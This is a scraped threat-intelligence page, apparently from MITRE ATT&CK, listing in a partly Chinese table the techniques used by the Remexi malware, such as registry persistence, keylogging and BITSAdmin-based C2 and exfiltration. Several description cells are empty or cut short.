Remexi
Techniques Used
| Domain | ID | Name | Use | |
|---|---|---|---|---|
| Enterprise | T1047 | Windows管理规范 |
Remexi executes received commands with wmic.exe (for WMI commands). [1] |
|
| Enterprise | T1115 | 剪贴板数据 | ||
| Enterprise | T1140 | 反混淆/解码文件或信息 |
Remexi decrypts the configuration data using XOR with 25-character keys.[1] |
|
| Enterprise | T1547 | .001 | 启动或登录自动启动执行: Registry Run Keys / Startup Folder |
Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism.[1] |
| .004 | 启动或登录自动启动执行: Winlogon Helper DLL |
Remexi achieves persistence using Userinit by adding the Registry key |
||
| Enterprise | T1059 | .003 | 命令与脚本解释器: Windows Command Shell | |
| .005 | 命令与脚本解释器: Visual Basic |
Remexi uses AutoIt and VBS scripts throughout its execution process.[1] |
||
| Enterprise | T1113 | 屏幕捕获 | ||
| Enterprise | T1071 | .001 | 应用层协议: Web Protocols |
Remexi uses BITSAdmin to communicate with the C2 server over HTTP.[1] |
| Enterprise | T1010 | 应用窗口发现 |
Remexi has a command to capture active windows on the machine and retrieve window titles.[1] |
|
| Enterprise | T1560 | 归档收集数据 |
Remexi encrypts and adds all gathered browser data into files for upload to C2.[1] |
|
| Enterprise | T1083 | 文件和目录发现 | ||
| Enterprise | T1027 | .013 | 混淆文件或信息: Encrypted/Encoded File | |
| Enterprise | T1056 | .001 | 输入捕获: Keylogging |
Remexi gathers and exfiltrates keystrokes from the machine.[1] |
| Enterprise | T1041 | 通过C2信道渗出 |
Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.[1] |
|
| Enterprise | T1053 | .005 | 预定任务/作业: Scheduled Task |
Remexi utilizes scheduled tasks as a persistence mechanism.[1] |